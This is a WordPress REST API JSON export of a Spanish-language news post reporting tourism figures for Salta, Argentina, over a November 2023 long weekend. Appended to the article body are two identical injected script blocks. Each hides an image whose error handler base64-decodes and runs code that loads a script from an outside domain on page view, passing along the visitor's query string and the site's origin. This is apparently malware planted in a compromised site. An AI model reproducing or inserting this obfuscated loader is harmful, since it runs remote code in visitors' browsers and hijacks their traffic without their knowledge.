{"id":3323,"date":"2023-11-21T08:32:10","date_gmt":"2023-11-21T11:32:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3323"},"modified":"2025-08-14T00:04:58","modified_gmt":"2025-08-14T03:04:58","slug":"el-turismo-dejo-1800-millones-en-salta-este-fin-de-semana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3323","title":{"rendered":"El turismo dej\u00f3 $1800 millones en Salta este fin de semana"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8f0b4a\"><em>La tasa neta de ocupaci\u00f3n tur\u00edstica fue del 54,5% durante el fin de semana extendido por el D\u00eda de la Soberan\u00eda Nacional.<\/em><\/h3>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;inform\u00f3 sobre los principales datos estad\u00edsticos que dej\u00f3 el fin de semana largo por el D\u00eda de la Soberan\u00eda Nacional en el que se registr\u00f3 una tasa neta de ocupaci\u00f3n tur\u00edstica del 54,5% y un impacto econ\u00f3mico de $1.834.119.926.<\/p>\n\n\n\n<p>En alojamientos salte\u00f1os fueron registrados 21.308 turistas con un pernocte promedio de 2,2 noches.<\/p>\n\n\n\n<p>Los destinos m\u00e1s elegidos por los turistas fueron San Antonio de los Cobres, Molinos, Cafayate, Coronel Moldes, Ciudad de Salta, Cachi, Rosario de la Frontera, San Lorenzo, La Caldera e Iruya.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;se\u00f1al\u00f3 que \u201ceste fin de semana largo definido por ley del Congreso Nacional el a\u00f1o pasado, coincidi\u00f3 con la finalizaci\u00f3n del proceso electoral, no obstante, turistas siguen eligiendo a Salta como destino\u201d y agreg\u00f3 que \u201cya se est\u00e1 trabajando en el \u00faltimo fin de semana largo del a\u00f1o que ser\u00e1 en diciembre y previo a la temporada de verano\u201d.<\/p>\n\n\n\n<p>Pe\u00f1a coment\u00f3 que \u201cel turismo en Argentina y particularmente en Salta es una de las actividades que m\u00e1s empleo y recursos generan, por eso, en un nuevo contexto de pa\u00eds, es clave la unidad y fortalecer el trabajo en conjunto, que es una din\u00e1mica habitual junto al sector privado\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-turismo-dejo-1800-millones-en-salta-este-fin-de-semana-92991\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La tasa neta de ocupaci\u00f3n tur\u00edstica fue del 54,5% durante el fin de semana extendido por el D\u00eda de la Soberan\u00eda Nacional. El&nbsp;Ministerio de Turismo y Deportes&nbsp;inform\u00f3 sobre los principales datos estad\u00edsticos que dej\u00f3 el fin de semana largo por el D\u00eda de la Soberan\u00eda Nacional en el que se registr\u00f3 una tasa neta de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3324,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3323","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3323"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3323"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3323\/revisions"}],"predecessor-version":[{"id":6914,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3323\/revisions\/6914"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3324"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3323"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3323"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}